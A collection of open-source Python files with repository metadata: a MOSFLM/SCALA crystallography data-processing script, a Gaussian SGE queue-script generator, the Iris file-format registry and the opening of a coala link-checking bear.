print 'Template image:',mosflm_template
print 'Batch number:',batch_prefix
print 'First image to process:',first_image
print 'Last image to process:',last_image
print 'Images for initial indexing:',image_seq_find
print 'Integration resolution limits:',integrate_res
if integrate_res == 'none':
print ' It may be better to specify the resolution limits'
print 'Expected space group number:',dt_spacegroup
if beam_x != 'none':
print 'Using input beam center:',beam_x,beam_y
if xtal_detector_distance != 'none':
print 'Using input detector distance:',xtal_detector_distance
# Go to image directory
os.chdir(image_dir)
# Process log
runtime = time.ctime(time.time())
file = open('autoprocess.log','w')
file.write('Processing start time : ')
file.write(runtime)
file.write('\n')
file.close()
# Eliminate debris from previous runs
fileexists = os.path.exists('COORDS')
if fileexists != 0:
os.remove('COORDS')
fileexists = os.path.exists('SUMMARY')
if fileexists != 0:
os.remove('SUMMARY')
fileexists = os.path.exists('NEWMAT')
if fileexists != 0:
os.remove('NEWMAT')
fileexists = os.path.exists('NEWMAT_REFINED')
if fileexists != 0:
os.remove('NEWMAT_REFINED')
###############
# Check index #
###############
if index_only == 'yes':
runtime = time.ctime(time.time())
print 'Date:',runtime
print 'Indexing test'
file = open('mi_mosflm_index_check.inp','w')
file.write('TITLE Indexing check in P1\n')
file.write('TEMPLATE ')
file.write(mosflm_template)
file.write('\n')
file.write('DIRECTORY "')
file.write(image_dir)
file.write('"\n')
# Apply user specified beam center if given
if beam_x != 'none':
file.write('BEAM ')
file.write(beam_x)
file.write(' ')
file.write(beam_y)
file.write('\n')
# Apply user specified distance if given
if xtal_detector_distance != 'none':
file.write('DISTANCE ')
file.write(xtal_detector_distance)
file.write('\n')
# Symmetry and indexing
file.write('SYMM 1\n')
file.write('SEPARATION CLOSE\n')
file.write('FINDSPOTS THRESHOLD 10\n')
file.write('AUTOINDEX DPS IMAGES ')
file.write(image_seq_find)
file.write('\n')
file.write('GO\n')
file.close()
# Execute
runmosflm = ipmosflm_path + ' < mi_mosflm_index_check.inp > mi_mosflm_index_check.log'
os.system(runmosflm)
fileexists = os.path.exists('NEWMAT')
if fileexists != 0:
os.remove('mi_mosflm_index_check.inp')
else:
print 'MOSFLM Indexing check seems to have failed'
time.sleep(4)
return 1
fileexists = os.path.exists('COORDS')
if fileexists != 0:
os.remove('COORDS')
fileexists = os.path.exists('SUMMARY')
if fileexists != 0:
os.remove('SUMMARY')
fileexists = os.path.exists('NEWMAT')
if fileexists != 0:
os.remove('NEWMAT')
print 'Testing indexing only. See file: mi_mosflm_index_check.log'
time.sleep(4)
return 1
###############
# Auto index #
###############
indexed = 'yes'
runtime = time.ctime(time.time())
print 'Date:',runtime
print 'Autoindexing'
file = open('mi_mosflm_index.inp','w')
file.write('TITLE Autoindexing\n')
file.write('TEMPLATE ')
file.write(mosflm_template)
file.write('\n')
file.write('DIRECTORY "')
file.write(image_dir)
file.write('"\n')
# Apply user specified beam center if given
if beam_x != 'none':
file.write('BEAM ')
file.write(beam_x)
file.write(' ')
file.write(beam_y)
file.write('\n')
# Apply user specified distance if given
if xtal_detector_distance != 'none':
file.write('DISTANCE ')
file.write(xtal_detector_distance)
file.write('\n')
# Symmetry and indexing
file.write('SYMM ')
file.write(dt_spacegroup)
file.write('\n')
file.write('SEPARATION CLOSE\n')
file.write('FINDSPOTS THRESHOLD 10\n')
file.write('AUTOINDEX DPS IMAGES ')
file.write(image_seq_find)
file.write('\n')
file.write('GO\n')
file.close()
# Execute
runmosflm = ipmosflm_path + ' < mi_mosflm_index.inp > mi_mosflm_index.log'
os.system(runmosflm)
fileexists = os.path.exists('NEWMAT')
if fileexists != 0:
os.remove('mi_mosflm_index.inp')
runtime = time.ctime(time.time())
file = open('autoprocess.log','a')
file.write('Autoindexing done : ')
file.write(runtime)
file.write('\n')
file.close()
# Obtain beam center
file = open('mi_mosflm_index.log')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('Beam coordinates of') > -1 and eachLine.find('have been refined') > -1:
aLine = eachLine.split()
beam_x_image = aLine[9]
beam_y_image = aLine[10]
if eachLine.find('***** WARNING ***** WARNING ***** WARNING') > -1:
indexed = 'no'
if beam_x_image == 'none' or beam_y_image == 'none':
print 'Parsing of beam center seems to have failed'
time.sleep(4)
return 1
else:
print 'MOSFLM Autoindexing seems to have failed'
time.sleep(4)
return 1
fileexists = os.path.exists('COORDS')
if fileexists != 0:
os.remove('COORDS')
fileexists = os.path.exists('SUMMARY')
if fileexists != 0:
os.remove('SUMMARY')
if indexed == 'no':
print 'There appears to be a problem with the direct beam position - stopping'
time.sleep(4)
return 1
#####################
# Cell Refinement #
#####################
refined = 'yes'
runtime = time.ctime(time.time())
print 'Date:',runtime
print 'Cell refinement'
file = open('mi_mosflm_refine.inp','w')
file.write('TITLE Cell refinement\n')
file.write('TEMPLATE ')
file.write(mosflm_template)
file.write('\n')
file.write('DIRECTORY "')
file.write(image_dir)
file.write('"\n')
file.write('MATRIX NEWMAT\n')
# Use beam center from indexing
file.write('BEAM ')
file.write(beam_x_image)
file.write(' ')
file.write(beam_y_image)
file.write('\n')
file.write('BACKSTOP CENTRE ')
file.write(beam_x_image)
file.write(' ')
file.write(beam_y_image)
file.write(' RADIUS 5.00\n')
# Apply user specified distance if given
if xtal_detector_distance != 'none':
file.write('DISTANCE ')
file.write(xtal_detector_distance)
file.write('\n')
file.write('SYMM ')
file.write(dt_spacegroup)
file.write('\n')
# Machine and crystal default
file.write('MOSAIC 0.70\n')
file.write('SEPARATION CLOSE\n')
file.write('GAIN ')
file.write(gain)
file.write('\n')
file.write('OVERLOAD CUTOFF 65500\n')
file.write('DISTORTION YSCALE 1.0000 TILT 0 TWIST 0\n')
if integrate_res != 'none':
file.write('RESOLUTION ')
file.write(integrate_res)
file.write('\n')
# Refinement
file.write('NEWMATRIX NEWMAT_REFINED\n')
file.write('POSTREF SEGMENT 3 MAXRESIDUAL 1.3 SHIFTFAC 3.0 MAXSHIFT 0.1 RESOLUTION 4.0\n')
file.write('PROCESS ')
file.write(cell_refine_images_segment1)
file.write('\nGO\n')
file.write('PROCESS ')
file.write(cell_refine_images_segment12)
file.write('\nGO\n')
file.write('PROCESS ')
file.write(cell_refine_images_segment2)
file.write('\nGO\n')
file.close()
# Execute
runmosflm = ipmosflm_path + ' < mi_mosflm_refine.inp > mi_mosflm_refine.log'
os.system(runmosflm)
fileexists = os.path.exists('NEWMAT_REFINED')
if fileexists != 0:
os.remove('mi_mosflm_refine.inp')
runtime = time.ctime(time.time())
file = open('autoprocess.log','a')
file.write('Cell refinement done : ')
file.write(runtime)
file.write('\n')
file.close()
# Check cell refinement
file = open('mi_mosflm_refine.log')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('INACCURATE CELL PARAMETERS') > -1:
refined = 'no'
else:
print 'MOSFLM cell refinement seems to have failed'
time.sleep(4)
return 1
fileexists = os.path.exists('SUMMARY')
if fileexists != 0:
os.remove('SUMMARY')
fileexists = os.path.exists('GENFILE')
if fileexists != 0:
os.remove('GENFILE')
fileexists = os.path.exists('NEWMAT')
if fileexists != 0:
os.remove('NEWMAT')
if refined == 'no':
print 'Cell parameters unreliable so trying indexing strategy'
runtime = time.ctime(time.time())
print 'Date:',runtime
print 'Cell estimation'
# Try rescue strategy with indexing
fileexists = os.path.exists('NEWMAT_REFINED')
if fileexists != 0:
os.remove('NEWMAT_REFINED')
file = open('mi_mosflm_reindex.inp','w')
file.write('TITLE Reindexing\n')
file.write('TEMPLATE ')
file.write(mosflm_template)
file.write('\n')
file.write('DIRECTORY "')
file.write(image_dir)
file.write('"\n')
file.write('BEAM ')
file.write(beam_x_image)
file.write(' ')
file.write(beam_y_image)
file.write('\n')
if xtal_detector_distance != 'none':
file.write('DISTANCE ')
file.write(xtal_detector_distance)
file.write('\n')
file.write('SYMM ')
file.write(dt_spacegroup)
file.write('\n')
file.write('SEPARATION CLOSE\n')
file.write('FINDSPOTS THRESHOLD 10\n')
file.write('AUTOINDEX DPS IMAGES ')
file.write(image_seq_reindex)
file.write('\n')
file.write('GO\n')
file.close()
# Execute
runmosflm = ipmosflm_path + ' < mi_mosflm_reindex.inp > mi_mosflm_reindex.log'
os.system(runmosflm)
runtime = time.ctime(time.time())
file = open('autoprocess.log','a')
file.write('Cell reestimation done : ')
file.write(runtime)
file.write('\n')
file.close()
fileexists = os.path.exists('COORDS')
if fileexists != 0:
os.remove('COORDS')
fileexists = os.path.exists('SUMMARY')
if fileexists != 0:
os.remove('SUMMARY')
fileexists = os.path.exists('mi_mosflm_reindex.inp')
if fileexists != 0:
os.remove('mi_mosflm_reindex.inp')
os.rename('NEWMAT','NEWMAT_REFINED')
###########################
# Integrate #
###########################
fileexists = os.path.exists('mi_integrate.mtz')
if fileexists != 0:
os.remove('mi_integrate.mtz')
runtime = time.ctime(time.time())
print 'Date:',runtime
print 'Image integration'
output_integrate_log = 'mi_mosflm_integrate_' + data_code_number + '.log'
file = open('mi_mosflm_integrate.inp','w')
file.write('TITLE Cell refinement\n')
file.write('TEMPLATE ')
file.write(mosflm_template)
file.write('\n')
file.write('DIRECTORY "')
file.write(image_dir)
file.write('"\n')
file.write('MATRIX NEWMAT_REFINED\n')
file.write('GENFILE GENFILE\n')
file.write('HKLOUT mi_integration.mtz\n')
file.write('BEAM ')
file.write(beam_x_image)
file.write(' ')
file.write(beam_y_image)
file.write('\n')
file.write('BACKSTOP CENTRE ')
file.write(beam_x_image)
file.write(' ')
file.write(beam_y_image)
file.write(' RADIUS 5.00\n')
# Apply user specified distance if given
if xtal_detector_distance != 'none':
file.write('DISTANCE ')
file.write(xtal_detector_distance)
file.write('\n')
file.write('SYMM ')
file.write(dt_spacegroup)
file.write('\n')
# Machine and crystal default
file.write('MOSAIC 0.70\n')
file.write('GAIN ')
file.write(gain)
file.write('\n')
file.write('OVERLOAD CUTOFF 65500\n')
file.write('DISTORTION YSCALE 1.0000 TILT 0 TWIST 0\n')
# Refinement
if integrate_res != 'none':
file.write('RESOLUTION ')
file.write(integrate_res)
file.write('\n')
file.write('POSTREF FIX ALL\n')
file.write('PROCESS ')
file.write(first_image)
file.write(' TO ')
file.write(last_image)
file.write('\nGO\n')
file.close()
# Execute
runmosflm = ipmosflm_path + ' < mi_mosflm_integrate.inp > ' + output_integrate_log
os.system(runmosflm)
fileexists = os.path.exists('mi_integration.mtz')
if fileexists != 0:
os.remove('mi_mosflm_integrate.inp')
else:
print 'MOSFLM integration seems to have failed'
time.sleep(4)
return 1
fileexists = os.path.exists('SUMMARY')
if fileexists != 0:
os.remove('SUMMARY')
fileexists = os.path.exists('GENFILE.gen')
if fileexists != 0:
os.remove('GENFILE.gen')
fileexists = os.path.exists('NEWMAT_REFINED')
if fileexists != 0:
os.remove('NEWMAT_REFINED')
fileexists = os.path.exists(filename_spt)
if fileexists != 0:
os.remove(filename_spt)
#################################
# Need to sort prior to merging #
#################################
fileexists = os.path.exists('mi_integration_sorted.mtz')
if fileexists != 0:
os.remove('mi_integration_sorted.mtz')
file = open('mi_sortmtz.inp','w')
file.write('H K L M/ISYM BATCH\n')
file.close()
run_sortmtz = 'sortmtz HKLIN mi_integration.mtz HKLOUT mi_integration_sorted.mtz < mi_sortmtz.inp > mi_sortmtz.log'
os.system(run_sortmtz)
fileexists = os.path.exists('mi_integration_sorted.mtz')
if fileexists == 0:
print 'Sorting process failed'
time.sleep(4)
return 1
else:
os.remove('mi_integration.mtz')
os.rename('mi_integration_sorted.mtz','mi_integration.mtz')
os.remove('mi_sortmtz.inp')
os.remove('mi_sortmtz.log')
# Check
fileexists = os.path.exists('mi_integration.mtz')
if fileexists == 0:
print 'File mi_integration.mtz is not available for merging'
time.sleep(4)
return 1
else:
runtime = time.ctime(time.time())
file = open('autoprocess.log','a')
file.write('Integration done : ')
file.write(runtime)
file.write('\n')
file.close()
#########################################################
# Automatic assessment of resolution limit if not given #
#########################################################
if integrate_res == 'none':
ioversigi_limit = 2.0
runtime = time.ctime(time.time())
print 'Date:',runtime
print 'Merging test'
output_ref_initial = 'ScalAverage_' + data_code_number + '_initial.mtz'
output_log_initial = 'scala_scaleaverage_' + data_code_number + '_initial.log'
file = open('mi_scala.inp','w')
file.write('TITLE First pass merging\n')
file.write('RUN 1 ALL\n')
file.write('INTENSITIES PARTIAL\n')
file.write('CYCLES 20\n')
file.write('ANOMALOUS OFF\n')
file.write('SDCORRECTION 1.3 0.02\n')
file.write('SCALES ROTATION SPACING 5 SECONDARY 6 TAILS BFACTOR ON BROTATION SPACING 20\n')
file.write('TIE BFACTOR 0.5\n')
file.write('REJECT 6 6 ALL -8 -8\n')
file.write('EXCLUDE EMAX 10\n')
file.write('BINS 20\n')
file.close()
run_scala = 'scala HKLIN mi_integration.mtz HKLOUT ' + output_ref_initial +\
' SCALES mi_scales.txt ROGUES mi_rogues.txt NORMPLOT mi_normplot.txt PLOT mi_plot.txt < mi_scala.inp > ' \
+ output_log_initial
os.system(run_scala)
fileexists = os.path.exists(output_ref_initial)
if fileexists == 0:
print 'Process SCALA seems to have failed'
time.sleep(4)
return 1
else:
os.remove('mi_scala.inp')
runtime = time.ctime(time.time())
file = open('autoprocess.log','a')
file.write('Merging check done : ')
file.write(runtime)
file.write('\n')
file.close()
# Clean
fileexists = os.path.exists(output_ref_initial)
if fileexists == 1:
os.remove(output_ref_initial)
fileexists = os.path.exists('mi_scales.txt')
if fileexists == 1:
os.remove('mi_scales.txt')
fileexists = os.path.exists('mi_rogues.txt')
if fileexists == 1:
os.remove('mi_rogues.txt')
fileexists = os.path.exists('mi_normplot.txt')
if fileexists == 1:
os.remove('mi_normplot.txt')
fileexists = os.path.exists('mi_plot.txt')
if fileexists == 1:
os.remove('mi_plot.txt')
fileexists = os.path.exists('fort.10')
if fileexists == 1:
os.remove('fort.10')
fileexists = os.path.exists('COORDS')
if fileexists == 1:
os.remove('COORDS')
fileexists = os.path.exists('ROGUEPLOT')
if fileexists == 1:
os.remove('ROGUEPLOT')
fileexists = os.path.exists('CORRELPLOT')
if fileexists == 1:
os.remove('CORRELPLOT')
# Capture table data to check merging
aList_res_high = []
aList_ioversigi = []
table_length = 0
read_table = 'no'
parse_table = 'no'
file = open(output_log_initial,'r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
aLine = eachLine.split()
if parse_table == 'yes':
num_entries = len(aLine)
if num_entries > 12:
res_high = aLine[2]
ioversigi = aLine[12]
aList_res_high.append(res_high)
aList_ioversigi.append(ioversigi)
# Find table segment
if eachLine.find('N 1/d^2 Dmin(A) Rmrg Rfull Rcum Ranom Nanom Av_I SIGMA I/sigma sd Mn(I/sd)') > -1:
read_table = 'yes'
if parse_table == 'yes' and aLine[0] == '$$':
read_table = 'no'
parse_table = 'no'
if read_table == 'yes' and aLine[0] == '$$':
parse_table = 'yes'
# Analyse table
table_length = len(aList_res_high)
count = 0
while count < table_length:
res_high = aList_res_high[count]
ioversigi = aList_ioversigi[count]
if ioversigi.find('.') > -1:
res_high = float(res_high)
ioversigi = float(ioversigi)
# Get optimal resolution
if ioversigi > ioversigi_limit and res_high < 3.5:
merging_res = res_high
merging_res = str(merging_res)
count = count + 1
print 'Using estimated resolution:',merging_res,'A'
fileexists = os.path.exists(output_log_initial)
if fileexists == 1:
os.remove(output_log_initial)
###############################################################
# Scale and average the integrated and profile-fitted reflns #
###############################################################
runtime = time.ctime(time.time())
print 'Date:',runtime
print 'Merging'
output_ref = 'ScalAverage_' + data_code_number + '.mtz'
output_log = 'scala_scaleaverage_' + data_code_number + '.log'
file = open('mi_scala.inp','w')
file.write('TITLE First pass merging\n')
file.write('RUN 1 ALL\n')
file.write('INTENSITIES PARTIAL\n')
file.write('CYCLES 20\n')
file.write('ANOMALOUS OFF\n')
file.write('SDCORRECTION 1.3 0.02\n')
file.write('SCALES ROTATION SPACING 5 SECONDARY 6 TAILS BFACTOR ON BROTATION SPACING 20\n')
file.write('TIE BFACTOR 0.5\n')
file.write('REJECT 6 6 ALL -8 -8\n')
file.write('EXCLUDE EMAX 10\n')
if merging_res != 'none':
file.write('RESOLUTION ')
file.write(merging_res)
file.write('\n')
file.close()
run_scala = 'scala HKLIN mi_integration.mtz HKLOUT ' + output_ref +\
' SCALES mi_scales.txt ROGUES mi_rogues.txt NORMPLOT mi_normplot.txt PLOT mi_plot.txt < mi_scala.inp > ' \
+ output_log
os.system(run_scala)
fileexists = os.path.exists(output_ref)
if fileexists == 0:
print 'Process SCALA seems to have failed'
time.sleep(4)
return 1
else:
os.remove('mi_scala.inp')
runtime = time.ctime(time.time())
file = open('autoprocess.log','a')
file.write('Merging done : ')
file.write(runtime)
file.write('\n')
file.close()
fileexists = os.path.exists('mi_scales.txt')
if fileexists == 1:
os.remove('mi_scales.txt')
fileexists = os.path.exists('mi_rogues.txt')
if fileexists == 1:
os.remove('mi_rogues.txt')
fileexists = os.path.exists('mi_normplot.txt')
if fileexists == 1:
os.remove('mi_normplot.txt')
fileexists = os.path.exists('mi_plot.txt')
if fileexists == 1:
os.remove('mi_plot.txt')
fileexists = os.path.exists('fort.10')
if fileexists == 1:
os.remove('fort.10')
fileexists = os.path.exists('COORDS')
if fileexists == 1:
os.remove('COORDS')
fileexists = os.path.exists('ROGUEPLOT')
if fileexists == 1:
os.remove('ROGUEPLOT')
fileexists = os.path.exists('CORRELPLOT')
if fileexists == 1:
os.remove('CORRELPLOT')
######################
# Tail end processes #
######################
# Transfer the final reflection and output files to defined space or leave in image directory
if final_workdir != 'none' and final_workdir != image_dir:
output_ref_destination = os.path.join(final_workdir,output_ref)
output_log_destination = os.path.join(final_workdir,output_log)
output_int_destination = os.path.join(final_workdir,output_integrate_log)
fileexists = os.path.exists(output_ref_destination)
if fileexists != 0:
os.remove(output_ref_destination)
fileexists = os.path.exists(output_log_destination)
if fileexists != 0:
os.remove(output_log_destination)
fileexists = os.path.exists(output_int_destination)
if fileexists != 0:
os.remove(output_int_destination)
os.rename(output_ref,output_ref_destination)
os.rename(output_log,output_log_destination)
os.rename(output_integrate_log,output_int_destination)
else:
output_ref_destination = os.path.join(image_dir,output_ref)
output_log_destination = os.path.join(image_dir,output_log)
output_int_destination = os.path.join(image_dir,output_integrate_log)
# Log and clean-up
runtime = time.ctime(time.time())
print 'Date:',runtime
print '\nIntegrated and merged intensity file:',output_ref_destination
print 'Integration log file file:',output_int_destination
print 'Merging statistics log file:',output_log_destination
time.sleep(4)
return 0
if __name__ == "__main__":
sys.exit(Run())
|
mifit/miexpert
|
mi_integrate.py
|
Python
|
gpl-3.0
| 36,722
|
[
"CRYSTAL"
] |
dcc033b0c7468067d54a3f016bfacee01e5fd5f6c269a17b9a13456f806f1f1c
|
import os
from commands import getoutput
from glob import glob
def gen_que(comfile, queue = 'gb', gauversion = 'd', QUE_PATH = False):
QUE_EXT = '.q'
text = """#!/bin/bash
### Request number of processors
SET_PROCS_NUM
### Previleges
SET_GRP_NAME
SET_QUE_NAME
### Home directory where the input files are located
SET_HOME
SET_STDOUT
SET_STDERR
### System variables
echo "This job is running on " $HOSTNAME
#$ -V
#$ -cwd
### Create NODE directory
export NODE_JOB_DIR=/scratch/$JOB_ID
mkdir -p $NODE_JOB_DIR
cd $NODE_JOB_DIR
### JOB NAME
SET_JOBNAME
### Copy the files to the NODE
cp $HOME_JOB_DIR/$JOBNAME $NODE_JOB_DIR
export JOBNAME_out=`basename $JOBNAME .com`.log
### Sets gaussian variables
export GAUSS_SCRDIR=$NODE_JOB_DIR
SET_GSOURCE
### Runs gaussian
g09 <$JOBNAME> $HOME_JOB_DIR/$JOBNAME_out
### Cleans scratch directory
rm $NODE_JOB_DIR/*.rwf
rm $NODE_JOB_DIR/*.scr
rm $NODE_JOB_DIR/*.chk
### Move file from NODE directory to the HOME directory
mv $NODE_JOB_DIR/* $HOME_JOB_DIR
rm -rf $NODE_JOB_DIR
echo `date '+%d %b %H:%M'` $HOME_JOB_DIR/$JOBNAME >> ~/log.que
"""
PROC_STR = {
'gb': "#$ -pe shared_mem 8",
'b1': "#$ -pe shared_mem 8",
'b2': "#$ -pe shared_mem 8",
'ib': "#$ -pe shared_mem 8",
'sp': "#$ -pe shm_s 12",
'rp': "#$ -pe shm_r 16"
}
GRP_STR = {
'gb': "#$ -P grupoA",
'b1': "#$ -P grupoA",
'b2': "#$ -P grupoA",
'ib': "#$ -P grupoA",
'sp': "#$ -P grupoA",
'rp': "#$ -P grupoA"
}
QUE_STR = {
'gb': "",
'b1': "#$ -q BIO1",
'b2': "#$ -q BIO2",
'ib': "#$ -q INFINIBAND",
'sp': "#$ -q SPECIAL",
'rp': "#$ -q RAPTOR"
}
GAU_VERSION_PATH = {
'gb': "source /opt/programs/gaussian/g09/%s/G09.sh",
'b1': "source /opt/programs/gaussian/g09/%s/G09.sh",
'b2': "source /opt/programs/gaussian/g09/%s/G09.sh",
'ib': "source /opt/programs/gaussian/g09/%s/G09.sh",
'sp': "source /opt/programs/gaussian/g09/%s/G09.sh",
'rp': "source /opt/programs/gaussian/g09/%s/G09.sh"
}
GAU_VERSION = {
'a': "a_pgi105",
'c': "c_pgi133",
'd': "d_pgi133"
}
# comfile without preceeding path (if any)
HOME_JOB_DIR = os.path.dirname(os.path.realpath(comfile)) # full path
comfile_wd = comfile.split('/')[-1] # filename only
comfile_full = '%s/%s' % (HOME_JOB_DIR, comfile_wd) # filename full
if QUE_PATH:
que_wd = '-'.join((comfile_full).split('/')[3:])
else:
que_wd = comfile_wd
if que_wd[0].isdigit():
que_wd = '_' + que_wd
que_full = '%s/%s' % (HOME_JOB_DIR, que_wd) # que full path
# change .com to .que
que_full = os.path.splitext(que_full)[0] + QUE_EXT
# print 'comfile'
# print comfile_wd
# print comfile_full
# print ''
# print 'que'
# print que_wd
# print que_full
# print ''
# SET stuff in text with replace
text = text.replace('SET_HOME', 'export HOME_JOB_DIR=%s' % HOME_JOB_DIR)
text = text.replace('SET_STDOUT', '#$ -o %s' % HOME_JOB_DIR)
text = text.replace('SET_STDERR', '#$ -e %s' % HOME_JOB_DIR)
text = text.replace('SET_JOBNAME', 'export JOBNAME=%s' % comfile_wd)
text = text.replace('SET_PROCS_NUM', PROC_STR[queue])
text = text.replace('SET_GRP_NAME', GRP_STR[queue])
text = text.replace('SET_QUE_NAME', QUE_STR[queue])
text = text.replace('SET_GSOURCE', GAU_VERSION_PATH[queue] % (
GAU_VERSION[gauversion]))
# write .que
with open(que_full, 'w') as f:
f.write(text)
return que_full
# GAUSSIAN STUFF
def config_gaucom(comfile, queue = 'gb', gauversion = 'd'):
""" take gaucom object as input, or filename ??? """
NPROC_STR = {
'gb': "%nprocshared=8\n",
'b1': "%nprocshared=8\n",
'b2': "%nprocshared=8\n",
'ib': "%nprocshared=8\n",
'sp': "%nprocshared=12\n",
'rp': "%nprocshared=16\n"
}
MEM_STR = {
'gb': "%mem=6200MB\n",
'b1': "%mem=6200MB\n",
'b2': "%mem=6200MB\n",
'ib': "%mem=6200MB\n",
'sp': "%mem=22500MB\n",
'rp': "%mem=62500MB\n"
}
# accepted_queue = ["rp", "sp", "b1", "b2", "gb", "ib"]
if type(comfile) == str: # TODO implement for gaucom objects
with open(comfile) as f:
text = f.readlines()
# erase nprocshared, mem
to_del = []
for i,line in enumerate(text):
if line.strip().startswith('#'):
break
if (
line.strip().startswith('%mem') or
line.strip().startswith('%nproc') or
line.strip().startswith('%Mem') or
line.strip().startswith('%Nproc')):
to_del.append(i)
for i in to_del[::-1]:
text.pop(i)
# add nprocshared, mem
text.insert(0, MEM_STR[queue])
text.insert(1, NPROC_STR[queue])
# write file
with open(comfile, 'w') as f:
for line in text:
f.write(line)
else:
errormessage = 'GaussianJob.config_gaucom() takes FILENAME as input'
raise RuntimeError(errormessage)
def sge_status(gauname_or_jobid):
""" input = gau.com, gau.log or 12345"""
qstat = getoutput('qstat')
if type(gauname_or_jobid) == int:
jobid = gauname_or_jobid
elif type(gauname_or_jobid) == str:
gauname = gauname_or_jobid
jobid = None # default
if not jobid:
# find quename.q
QUE_EXT = '.q'
quename = os.path.splitext(gauname)[0] + QUE_EXT
if quename[0].isdigit():
quename = '_' + quename
# find quename.o12345
jobsto = glob(quename + '.o*')
if len(jobsto) == 1:
jobid = int(jobsto[0].split('%s.o' % QUE_EXT)[-1])
elif len(jobsto) > 1:
jobid = max([int(j.split('%s.o' % QUE_EXT)[-1]) for j in jobsto])
# seek in qstat
elif len(jobsto) == 0:
jobids = [int(line[:8]) for line in qstat.split('\n')[2:]]
for j in jobids:
job_name = getoutput('qstat -j %d | grep job_name:' % j)
job_name = job_name.split()[1]
if job_name == quename:
cwd = getoutput('qstat -j %d | grep stdout' % j)
cwd = cwd.split('NONE:NONE:')[1]
if cwd == os.path.getcwd(): # not working with paths yet
jobid = j
# Now that jobid is defined
status = []
for line in qstat.split('\n')[2:]:
if int(line[:8]) == jobid:
status.append(line[40:45].strip())
# not found
if len(status) == 0:
status.append(False)
# multiple
elif len(status) > 1:
raise RuntimeError('Multiple qstat jobs found!')
return status[0], jobid
|
eduardoftoliveira/oniomMacGyver
|
omg/qtrex.py
|
Python
|
gpl-3.0
| 7,009
|
[
"Gaussian"
] |
8a13fefd01c35d068a517084ba37a7330c53f374c4adad0fa637c3aa81c0d265
|
# Copyright Iris contributors
#
# This file is part of Iris and is released under the LGPL license.
# See COPYING and COPYING.LESSER in the root of the repository for full
# licensing details.
"""
A package for converting cubes to and from specific file formats.
"""
from iris.io.format_picker import (
FileExtension,
FormatAgent,
FormatSpecification,
MagicNumber,
UriProtocol,
LeadingLine,
)
from . import abf
from . import um
from . import name
from . import netcdf
from . import nimrod
from . import pp
__all__ = ["FORMAT_AGENT"]
FORMAT_AGENT = FormatAgent()
FORMAT_AGENT.__doc__ = (
"The FORMAT_AGENT is responsible for identifying the "
"format of a given URI. New formats can be added "
"with the **add_spec** method."
)
#
# PP files.
#
FORMAT_AGENT.add_spec(
FormatSpecification(
"UM Post Processing file (PP)",
MagicNumber(4),
0x00000100,
pp.load_cubes,
priority=5,
constraint_aware_handler=True,
)
)
FORMAT_AGENT.add_spec(
FormatSpecification(
"UM Post Processing file (PP) little-endian",
MagicNumber(4),
0x00010000,
pp.load_cubes_little_endian,
priority=3,
constraint_aware_handler=True,
)
)
#
# GRIB files.
#
def _load_grib(*args, **kwargs):
try:
from iris_grib import load_cubes
except ImportError:
raise RuntimeError(
"Unable to load GRIB file - "
'"iris_grib" package is not installed.'
)
return load_cubes(*args, **kwargs)
# NB. Because this is such a "fuzzy" check, we give this a very low
# priority to avoid collateral damage from false positives.
FORMAT_AGENT.add_spec(
FormatSpecification(
"GRIB",
MagicNumber(100),
lambda header_bytes: b"GRIB" in header_bytes,
_load_grib,
priority=1,
)
)
#
# netCDF files.
#
FORMAT_AGENT.add_spec(
FormatSpecification(
"NetCDF", MagicNumber(4), 0x43444601, netcdf.load_cubes, priority=5
)
)
FORMAT_AGENT.add_spec(
FormatSpecification(
"NetCDF 64 bit offset format",
MagicNumber(4),
0x43444602,
netcdf.load_cubes,
priority=5,
)
)
# This covers both v4 and v4 classic model.
FORMAT_AGENT.add_spec(
FormatSpecification(
"NetCDF_v4",
MagicNumber(8),
0x894844460D0A1A0A,
netcdf.load_cubes,
priority=5,
)
)
_nc_dap = FormatSpecification(
"NetCDF OPeNDAP",
UriProtocol(),
lambda protocol: protocol in ["http", "https"],
netcdf.load_cubes,
priority=6,
)
FORMAT_AGENT.add_spec(_nc_dap)
del _nc_dap
#
# UM Fieldsfiles.
#
FORMAT_AGENT.add_spec(
FormatSpecification(
"UM Fieldsfile (FF) pre v3.1",
MagicNumber(8),
0x000000000000000F,
um.load_cubes,
priority=3,
constraint_aware_handler=True,
)
)
FORMAT_AGENT.add_spec(
FormatSpecification(
"UM Fieldsfile (FF) post v5.2",
MagicNumber(8),
0x0000000000000014,
um.load_cubes,
priority=4,
constraint_aware_handler=True,
)
)
FORMAT_AGENT.add_spec(
FormatSpecification(
"UM Fieldsfile (FF) ancillary",
MagicNumber(8),
0xFFFFFFFFFFFF8000,
um.load_cubes,
priority=3,
constraint_aware_handler=True,
)
)
FORMAT_AGENT.add_spec(
FormatSpecification(
"UM Fieldsfile (FF) converted " "with ieee to 32 bit",
MagicNumber(4),
0x00000014,
um.load_cubes_32bit_ieee,
priority=3,
constraint_aware_handler=True,
)
)
FORMAT_AGENT.add_spec(
FormatSpecification(
"UM Fieldsfile (FF) ancillary " "converted with ieee to 32 bit",
MagicNumber(4),
0xFFFF8000,
um.load_cubes_32bit_ieee,
priority=3,
constraint_aware_handler=True,
)
)
#
# NIMROD files.
#
FORMAT_AGENT.add_spec(
FormatSpecification(
"NIMROD", MagicNumber(4), 0x00000200, nimrod.load_cubes, priority=3
)
)
#
# NAME files.
#
FORMAT_AGENT.add_spec(
FormatSpecification(
"NAME III",
LeadingLine(),
lambda line: line.lstrip().startswith(b"NAME III"),
name.load_cubes,
priority=5,
)
)
#
# ABF/ABL
#
FORMAT_AGENT.add_spec(
FormatSpecification(
"ABF", FileExtension(), ".abf", abf.load_cubes, priority=3
)
)
FORMAT_AGENT.add_spec(
FormatSpecification(
"ABL", FileExtension(), ".abl", abf.load_cubes, priority=3
)
)
|
pp-mo/iris
|
lib/iris/fileformats/__init__.py
|
Python
|
lgpl-3.0
| 4,539
|
[
"NetCDF"
] |
7e9fdb7e1c5d73dcfa9810b4377f2a8c8c3a9db41ec7e265e0217d86a4b2bf32
|
import re
import requests
from difflib import SequenceMatcher
from coalib.results.Diff import Diff
from coalib.bears.LocalBear import LocalBear
from coalib.bears.requirements.PipRequirement import PipRequirement
from coalib.results.RESULT_SEVERITY import RESULT_SEVERITY
from coalib.results.Result import Result
from coalib.bearlib import deprecate_settings
class InvalidLinkBear(LocalBear):
DEFAULT_TIMEOUT = 2
LANGUAGES = {"All"}
REQUIREMENTS = {PipRequirement('requests', '2.*')}
